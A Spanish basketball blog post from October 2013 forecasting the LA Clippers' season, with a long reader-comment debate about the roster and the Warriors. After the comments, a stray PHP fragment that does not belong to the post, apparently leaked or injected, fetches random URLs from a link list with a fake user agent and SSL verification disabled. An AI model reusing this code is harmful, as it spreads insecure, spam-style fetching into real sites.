Los Angeles Clippers: A medio plazo

19 de October de 2013 por Esteban

No comparto el optimismo generalizado que existe entre los expertos respecto estos nuevos Clippers. Muchos los dan ahora como candidatos al título y consideran que han mejorado su plantel de manera notable en comparación de la temporada pasada. Es algo que no comparto en absoluto pues desde mi puntos de vista tienen menos equipo que la pasada temporada.

Han salido jugadores veteranísimos que tenían sus días contados como profesionales y a cambio han llegado jugadores más jóvenes con varios años en la liga. De este modo, pueden tener un 5 titular estable por los próximos 3 años y varios jugadores del banquillo en edad de evolucionar durante las próximas tres temporadas. Esta mejora a medio plazo ha disminuido el nivel al corto.

Las salidas de hombres experimentados como Billups, Hill, Butler y Odom, todos ellos con muchos playoffs en sus espaldas y varios títulos, han sido reemplazadas por JJ Redick, que a los 28 años nunca ha sido titular en un equipo de PO y mucho menos en un aspirante al anillo, Jared Dudley, que no pisa postemporada hace 4 años, y Byron Mullens, que proviene del que ha sido durante dos años seguidos el peor equipo de la liga o uno de los peores. Estas no son mejoras notables ni mucho menos. Si a eso le sumamos la salida de un Eric Bledsoe en franco ascenso en su carrera y la llegada de un Darren Collison que evoluciona en sentido contrario no veo donde están las supuestas mejoras de la plantilla. 

Como ya hemos comentado, logran armar un equipo algo más estable a medio plazo algo que seguramente era necesario. Grant Hill ya está retirado, Billups se sabía que no podría competir a gran nivel muchos años más, Odom es un ex jugador, Butler comenzaba a evidenciar problemas físicos y a Bledsoe no se le iba a poder renovar por el dinero que merecía. En cambio, todos los nuevos han firmado contratos a medio plazo.

Veamos con que cuentan estos Clippers para mejorar su eliminación de primera ronda de la temporada pasada:

En la base el director de orquesta será Chris Paul, el mejor base de la liga y quizá el jugador más determinante de la NBA por detrás de Lebron y Durant. Con CP3 físicamente bien, no hay dudas del nivel mínimo que pueden ofrecer los Clippers. Este año tendrá dos aviones volando sobre el aro a fin de liquidar sus puentes aéreos y dos francotiradores abiertos que le darán el espacio para penetrar y generar. Del quinteto inicial, el único jugador capaz de crear su tiro u opciones a los demás es Paul, así que todo dependerá de él.

Como base suplente aparece Darren Collison que viene de decepcionar a todos en Dallas. En cambio, en la postemporada de 2012 asumió con relativo éxito un rol de sexto hombre con los Pacers. No es un creador de juego eficaz ni un anotador completo pero saliendo de la banca sus defectos se verán disimulados y su velocidad tendrá un punto extra. No es Bledsoe, queda claro, pero por el irrisorio precio por el que ha firmado (ni 2 millones), hay pocos jugadores mejores en la liga.

Como escolta tenemos al francotirador JJ Redick, buen defensor y poco más. La gerencia se entusiasmó por su nivel ofrecido en Orlando el año pasado pero pierde de vista lo poco que aportó tras su traspaso a los Bucks. Toda la vida como tirador reserva y defensor perimetral en un equipo a medias aguas como Orlando y ahora se ha convertido en el escolta titular de un supuesto aspirante al título. ¿Cómo responderá? Es una incógnita sin respuesta. Jugando al lado de Paul, tendrá triples abiertos, no hay dudas, pero tampoco hay dudas de que sus puntos solo llegaran de esa manera. Jared Dudley completará el perímetro titular. Otro tirador a pie firme y poco más que hace años que no juega en un equipo competitivo. Falta creación y talento en este perímetro. Dos tiradores que poco más pueden hacer son un caramelo para las defensas personales de la NBA, más aún si sus internos no son lo suficientemente buenos como para atraer dobles marcas. De ahí que la importancia de Paul sea suprema.

Toda la creación que les falta a sus titulares la tiene Jamal Crawford, que será el sexto hombre del equipo. Viene de un año fantástico y le dará la penetración y el revulsivo que necesitarán y mucho estos Clippers. Willie Green también está en el plantel, pero su rol se reducirá a cubrir las bajas que pudieran surgir. Completa el perímetro Matt Barnes, otro que cuajó una gran temporada, gracias a su intensidad y por qué no, a su calidad, anotando mucho en contragolpe y lanzando particularmente bien de tres puntos. Los 3 forman un perímetro suplente de lujo, que fue el mejor de la temporada pasada y debería estar a un nivel similar este año.

Pasamos al punto más flojo del equipo que es el juego interior:

Como necesitaba mucho espacio para explicar mi opinión sobre Blake Griffin, mañana se publicará un artículo centrado exclusivamente en este jugador (¡toma cliffhanger!). Pasemos directamente a su compañero en la zona, Deandre Jordan. Defensor promedio, buen taponador,  regular reboteador y pésimo en ataque. Llama la atención los galones que le dan a pesar de ser incapaz de defender a buenos internos y convertirse en un riesgo severo con la pelota en las manos.

Los recambios no desentonan. Sin duda Rivers podrá sacar algo bueno de Antawn Jamison, quien puede anotar sin dificultades desde el poste, cosa que no hacen los titulares. Su rol será crucial porque es el único jugador interior capaz de crearse su propio tiro. Byron Mullens debería cuajar una buena temporada jugando sin presión y sin que nadie espere nada de él. Puede afirmarse como una sólida opción de tiro de tres puntos, estilo Novak o Bonner. Si lo logra tendrá un papel en este equipo porque el resto lo hace entre mal y muy mal. Por último, Ryan Hollins completa el equipo para aportar sus valiosas 6 faltas si se cruzan con Howard. Aunque Hollins juega por el contrato mínimo y DeAndre Jordan goza de uno muy alto, desde mi perspectiva, son más o menos la misma cosa. Louis Amundson está jugando la pretemporada pero aún no tiene contrato. Me gusta este chaval, ojalá se quede.

No he hablado aún del nuevo entrenador y máxima ilusión de Los Angeles, un tal Doc Rivers. No quiero menospreciarle pero lo considero un buen entrenador, no un mago, y no veo material suficiente como para ir por el título salvo que Griffin explote de una manera poco probable. No nos olvidemos como deambulaban los Lakers del Maestro Zen en la mediocridad antes de la llegada de Gasol. Hasta el mejor entrenador necesita un buen grupo de apoyo. El ex entrenador de los Celtics siempre se ha caracterizado por ser un técnico genial en postemporada, pero lo cierto es que fue genial cuando tuvo jugadores genialescomo Garnett, Pierce y Allen. Cada entrenador hace lo que puede con lo que tiene y hoy los Clippers carecen de experiencia en PO y de hombres capaces de definir juegos. Paul es uno de los mejores pero ya hemos visto que si él no puede anotar al final de los juegos ningún clipper lo hará.

Defensivamente es un equipo que dejará mucho que desear a pesar de los esfuerzos de Rivers. Griffin es un mal defensor y Jordan, si bien bloquea balones, no puede ser comparado con la voz de mando de Garnett. Mientras que en ofensiva como hemos dicho, carece del desequilibrio individual de jugadores que no sean Chris  Paul.

Quinteto: Chris Paul, JJ Redick, Jared Dudley, Blake Griffin, DeAndre Jordan
Sexto hombre: Jamal Crawford

Pronóstico: 5º-6º del Oeste (unas 50 victorias). Primera ronda de playoffs.

Comenta

22 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Comparto la opinión de Esteban.Lo cierto es que la transición del año pasado a este,con todos los cambios que se han producido,ha resultado en un equipo muy endeble que prácticamente exigirá la mejor versión de todos,desde la plantillas hasta el entrenador -y en la mayoría de casos,nunca han jugado a ese nivel- .Y aún en ese nivel,creo que hay otros equipos que son más fuertes que los Clippers.Algo positivo tendrá esto y es que CP3 tendrá que recuperar el nivelazo que tenía hace unos años.Ha sido muy constante a lo largo de su carrera pero ese punto aniquilador que tenía en New Orleans,intuyo que aparecerá de nuevo.De momento Doc Rivers parece querer picarle.

    Les beneficia sobremanera que su división es muy floja,con esa versión de serie B de los Lakers,esos Phoenix a punto de resurgir -ahora no- y los Kings que ahí están,intentando encontrar la identidad.Lo mejor que hay son los Warrios y creo que si no hay lesiones mediante,les pegan un repaso a estos Clippers de aupa.Pero bueno,para meterse en PO,los nuevos Clippers van sobrados.En los cruces…

      Citar

  2. Denise dice:
    #2

    Hombre, no están en el Top 3 de aspirantes al anillo, pero con un poco de suerte y llegando en buen momento de forma a playoffs, creo que si podrían aspirar al anillo. Tienen a un buen entrenador, y la plantilla es profunda. Que Redick ó Dudley tengan mas dificultades para generar propios tiros ante defensores de élite no es un problema, aqui si hay un base repartidor como Paul para generar ventajas más la aportación mas la siempre aportación de Crawford. No comparto, Esteban, tu opinión sobre Collison, a mi me parece un gran jugador para tenerlo de segundo base, porque aunque es irregular, sabes que tiene calidad y capacidad de sobra para marcarse partidazos
    Yo en el perimetro no veo problemas, donde los veo es dentro, es hora que Griffin y Jordan den un paso adelante y muestren algunas mejorias en ataque, que no solo anoten a base de fisico, que nos brinden algunos movimientos ofensivos de calidad. Que Mullens jugase en uno de los peores equipos de los ultimos años no quita para que sea un buen refuerzo como primer recambio interno, muy mal lo tendría que hacer para no mejorar al Odom del año pasado. Despues Jamison tambien es un gran refuerzo.

    Veo la lista de altas y bajas, y no me parece en absoluto que el equipo sea inferior al del año pasado.
    Lo que me está extrañando de la Preseason es que su primera ronda Reggie Bulock no ha jugado un solo minuto, desconozco si está lesionado, pero durante los dias del Draft habia hablado muy bien de él y me sorprende que no le hayan dado una sola oportunidad.
    En fin, que el equipo debería pasar la primera ronda, dar guerra en semifinales de conferencia y por qué no optar al anillo.

      Citar

  3. TheDeerHunter dice:
    #3

    Yo creo que en absoluto es inferior al año pasado.
    En mi opinión es ahora mismo el candidato nº1 a ganar el oeste. Que conste en acta.

      Citar

  4. Heineken dice:
    #4

    Noto cierta bilis en el autor del articulo hacia los clippers… un laker resentido tal vez?? No se, pero de pronto todos menos CP3 y Crawford son paquetes.

    PD: Para mi CP3 no es el mejor base de la NBA, es Tony Parker.

      Citar

  5. txusma dice:
    #5

    Hay una cosa (bueno varias, pero me centro en una) en la que tiene mucha razón Esteban. Aparte de Chris Paul no veo a ningún jugador con espíritu Playoffs. Pueden ganar la regular pero una vez allí, los Spurs, por poner un ejemplo, se los comen con papas. Suponemos que Doc Rivers llega para ofrecer ese punch. Veremos si los jugadores recogen el guante.

      Citar

  6. Esteban dice:
    #6

    Heineken: e los dias del Draft habia hablado muy bien de él y me sorprende que no le hayan dado una sola oportunidad.
    En fin, que el equipo debería pasar la primera ronda, dar guerra

    por el contrario, si le preguntas a txusma te dira que soy mas clipper q ninguno

    simplemente no me gusta el equipo, y mañana saldra el bonus track sobre de griffin y entenderan por que los veo como un equipo tan endeble

      Citar

  7. Esteban dice:
    #7

    realemnte no entiendo como alguien puede considerar como campeon a un equipo que en su 5 inicial tiene a redick, dudley y deandre jordan ¿?

      Citar

  8. nba dice:
    #8

    TheDeerHunter:
    Yo creo que en absoluto es inferior al año pasado.
    En mi opinión es ahora mismo el candidato nº1 a ganar el oeste. Que conste en acta.

    Yo al menos los veo como serios animadores de la regular a poco que Rivers insufle un poco de su espiritu a sus jugadores

      Citar

  9. Denise dice:
    #9

    Esteban:
    realemnte no entiendo como alguien puede considerar como campeon a un equipo que en su 5 inicial tiene a redick, dudley y deandre jordan ¿?

    Pero hay que mirar todo el conjunto, Esteban.
    Crawford no es titular pero tiene un papel importantisimo. Y en el banco le siguen quedando Barnes, Collison, Mullens y Jamison.
    Y hombre, tampoco los 3 que nombras son unos paquetes infumables. Redick no hace falta decir que es un gran tirador para tenerlo en una esquina esperando a que Paul le pase la bola. Dudley es otro buen tirador, bastante consistente en ataque en los ultimos años. Manco no son ninguno de los dos.
    Y Jordan es un paquete delante pero detrás pues hace su trabajo. Es joven aun y con Rivers deberia progresar.

      Citar

  10. Esteban dice:
    #10

    Si quiza subestimo a rivers, he visto algun juego de los clippers donde la defensa fue bastante byuena

    Aun asi, no les veo pasta de equipo de PO, con tiradores delibres fatales como griffin y jordan y dos hombres que no pueden genrarse su tiro como dudley y reddick

    Todo dependera de q tan genial sea cp3 pero ni aun asi…

      Citar

  11. Denise dice:
    #11

    Esteban:
    dos hombres que no pueden genrarse su tiro como dudley y reddick

    jaja, le repartes demasiada cera a estos dos.
    No son All-Stars y me los imagino siendo defendidos uno por Wade y otro por Lebron y ahi si les costaría crearse su tiro, pero ante el nivel medio de la liga, son dos jugadores validos y en caso de JJ, del que puedo opinar mas porque lo he visto jugar mas, a veces con Orlando ha intentado crear y organizar y repito ante defensores medios tambien puede crearse el tiro.

      Citar

  12. TheDeerHunter dice:
    #12

    Para mí de entrada tienen el equipo más profundo del oeste ahora mismo, y el mejor técnico.
    ¿Pegada en playoffs? CP3, por supuesto y Griffin también pienso que lo va a hacer bien. Todo lo demás son gente sólida, que conoce el oficio y que aporta alternativas tácticas interesantes. Además muchos de ellos han demostrado que saben jugar eliminatorias… aunque sea desde un perfil más secundario.
    Sobra decir que no estoy de acuerdo con poner tan a caldo a algunos de los que se han nombrado peyorativamente aquí.

      Citar

  13. HisRoyalAirness dice:
    #13

    Juas, vaya somanta de hostias. No me lo esperaba pero la verdad es que estoy bastante de acuerdo.

      Citar

  14. Denise dice:
    #14

    TheDeerHunter:
    Para mí de entrada tienen el equipo más profundo del oeste ahora mismo, y el mejor técnico.

    Por profundidad, los Warriors los veo superiores.

      Citar

  15. TheDeerHunter dice:
    #15

    Denise: Por profundidad, los Warriors los veo superiores.

    Rotación aprovechable:
    GS: Curry, Thompson, Iggy, Lee, ¿Bogut?, Barnes, Speights… y para de contar. Podría negociar meter a Jermaine, pero… pff (Equipazo… no lo pongo en duda ¿eh?)
    LAC: CP3, Reddick, Dudley, Griffin, Jordan, Crawford, Barnes, Collison, Jamison, Mullens, Green… y dudo si meter a Hollins.

      Citar

  16. R1Molano dice:
    #16

    Bueno, estas metiendo a medianías tremendas como Mullens y Green (este tirando alarmantemente a paquete) y te dejas en GSW a Draymond Green que es un competidor tremendo, tiene mucho peso en este equipo y ha mejorado mucho el tiro este verano. Douglas también puede aportar, aunque a mi no me gusta absolutamente nada, Nedovic (talentazo) debería robarle minutos en nada.

    Jermaine en pretemporada ha mostrado poquito, pero bueno, lo suyo es hacer el rol de Ezeli, defender duro que lo sigue haciendo y en ataque ser un tío que no se puede dejar solo y tal, tampoco es que necesitemos anotación interior de parte del C, por lo menos mientras Lee este a su nivel.

    Bogut esta bien, el dice 100% (bueno, el otro día se le paro por una pequeña contractura en la espalda), con 10 kilos menos y muy muy rápido, ademas este año de vez en cuando se genera puntos en el poste.

    Y bueno… yo hasta el 3Q del partido del viernes no era consciente de lo acojonantemente bueno que va a ser Iguodala ¡en ataque! en este equipo, básicamente porque es una brutalidad como pasador y las ventajas que va a generar atacando el aro y sacando van a ser brutales, mas cuando los receptores por fuera van a ser Curry y Thompson.

    A mi los Clippers me parecen un equipo al que le falta estar un poco mejor construido, por fuera me gusta muchísimo el equipo, muy muy profundo y con gente de todos los perfiles, pero por dentro… dependen de una supuesta gran mejora de Jordan y que Griffin de un paso adelante, detrás de ellos esta la mas absoluta miseria, necesitan un tio como Kenyon Martin ahí, mas teniendo en cuenta que Jordan no puede acabar partidos con su 45% en tiros libres.

    Al final van a acabar los partidos con Jamison-Griffin y esto es una falta de defensa interior importante, mas si te vas a jugar las castañas con San Antonio o con algún rival que pueda meter balones dentro.

    Principalmente es que si Bogut aguanta creo que deberíamos ganarles en un cruce. Deberían arreglar ese defecto antes de febrero.

      Citar

  17. TheDeerHunter dice:
    #17

    Mullens y Green han sido titulares. Es un hecho. Fácilmente Green, medianía o lo que tú quieras, puede ser el jugador nº12 habiendo sido titular en algunos tramos de su carrera y en equipo de playoffs. En mi opinión es un defensor más que digno. Mullens perfectamente puede ser un 8º hombre en la rotación.

    Aún tengo que ver cómo de importante es Daymond Green. La temporada pasada, en condiciones normales jugaba poco más de 13 minutos por partido. Si tiene que repartir minutos con Lee, Speights, Barnes e incluso Iguodala o Thompson lo va a pasar jodidamente mal para rascar algo de bola. No te digo nada de Nedovic.

    No deseo convertir este debate en un LAC vs GS, porque no se trata de que los Warriors tengan mal equipo ni mucho menos. Yo solo digo que los Clippers tienen una rotación útil de 12 jugadores. Esto no es opinable.

      Citar

  18. Viva_Dirk dice:
    #18

    Me parecen exageradas las críticas de Esteban. De DeAndre dice literalmente que ‘es un peligro con el balón en las manos’, bueno, de los centers titulares que hay en la liga, hay un puñado peores y que no tienen sus cualidades físicas ni su juventud. De los campeones de los últimos 15 años hay centers titulares como Ben Wallace, Perkins y Tyson Chandler, que no tienen mas capacidad ofensiva que Jordan; y equipos que directamente no tenian centers como los Spurs de 2005 o los Heat de ahora mismo.

    Y luego Redick y Dudley como dices son grandes tiradores en estático y buenos defensores, cualidades muy buenas para rodear a 2 estrellas. Tipos como Chalmers, Ariza, Bowen o Posey se han puesto anillos en la mano haciendo eso.

    Además si viera uno o varios equipos que lo tenga todo en el Oeste, te daría algo de razón en cuanto a que pueden caer en primera ronda, pero los que tienen un gran caudal ofensivo como Warriors o Rockets hay que verlos defendiendo.

    Y para rematar tienen a Rivers, que sabemos que es un entrenador de los que ganan partidos y un gran preparador de eliminatorias de playoffs.

      Citar

  19. Denise dice:
    #19

    TheDeerHunter: Rotación aprovechable:
    GS: Curry, Thompson, Iggy, Lee, ¿Bogut?, Barnes, Speights… y para de contar. Podría negociar meter a Jermaine, pero… pff (Equipazo… no lo pongo en duda ¿eh?)
    LAC: CP3, Reddick, Dudley, Griffin, Jordan, Crawford, Barnes, Collison, Jamison, Mullens, Green… y dudo si meter a Hollins.

    Deer te dejas a 3 jovenes muy aprovechables y a Toney Douglas
    Draymond Green que como te ha respondido Molano es todo un todoterreno, Festus Ezeli que es una bestia parda y en edad de mejorar bastante aun, y el que mas me gusta es Kent Bazemore que se ha marcado una Summer League brutal.
    Con el tremendo quinteto que tienen los GSW no van a jugar mucho, pero si los titulares se lesionan, estos tres tios te pueden solucionar la papeleta en su medida.

    Rotacion aprovechable.
    PG: Curry, Douglas
    SG: Thompson, Bazemore
    SF: Iguodala, Barnes, Green
    PF: Lee, Speights
    C: Bogut, Ezeli, O’Neal.

    Tambien tienen al hermano de Curry (Seth Curry), a Nedovic y a Kuzmic pero como nunca los he visto jugar, no opino de ellos.

      Citar

  20. Denise dice:
    #20

    R1Molano:
    Bueno, estas metiendo a medianías tremendas como Mullens y Green (este tirando alarmantemente a paquete)

    A mi Willie Green no me parece un paquete en absoluto. Es uno de esos jugadores de rol que saben perfectamente cual es su rol y no hacen locuras en pista. Ademas cumple y mucho en los dos lados de la cancha. Atrás defiende bastante bien tanto a PG’s como a SG y sabe que los minutos que va a jugar se los tiene que ganar defendiendo a muerte a su par. Y en ataque no es manco ni mucho menos. Obviamente dispone de pocos tiros y de minutos, y no lo vas a ver haciendo numerazos, pero es un tio tremendamente regular.

      Citar

  21. GreenPride dice:
    #21

    Tengo que decir que estoy de acuerdo con Esteban. Para mí el equipo es potencialmente peor que el del año pasado si bien han sustituido jugadores en la cuesta abajo de sus carrerras como Odom, Hill o Billups por gente que está menos cascada como Reddick o Dudley pero también con bastante menos calidad. El gran acierto para mí es Rivers, un gran entrenador pero a no ser que Griffin se convierta en un jugador entre los 5 mejores de la liga que lo veo difícil les doy muy pocas posibilidades de luchar por el título. Creo que sus partidos serán divertidos y que lo harán más o menos bien en la regular pero no les veo casi ni llegando a segunda ronda en PO.
    PD: Para mí GSW tiene bastante mejor equipo que estos Clippers.

      Citar

  22. R1Molano dice:
    #22

    Ezeli esta roto por al menos 4 meses mas, como mucho va a llegar para un mes de RS y PO, realmente este año le contaría para poco. Lastima de lesión porque es un jugador que estaba mejorando una barbaridad, aporta mucho en defensa y en ataque estaba cogiendo confianza y dejando de cometer algunos fallos de vuelto que tenia.

    Draymond Green viene de hacer unos PO muy muy buenos, ha bajado peso y ha mejorado mucho su tiro. Aparte es un jugador de intangibles, el año pasado siempre estaba cuando el partido estaba caliente.

    Bazemore tiene mucho potencial y fue dominador en SL, pero no esta haciendo una buena pretemporada, va a oler pista porque se ha generado un buen tiro y defiende duro, pero a nivel NBA no puede hacer el juego de PG que hacia en la SL. Dentro de esos jugadores secundarios el que mejor pinta es Nedovic, tiene unas condiciones brutales, pero le va a costar hacerse al equipo. Mientras tanto Douglas hará un apaño en el PG suplente, aunque Iguodala va a jugar en el point algunos minutos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>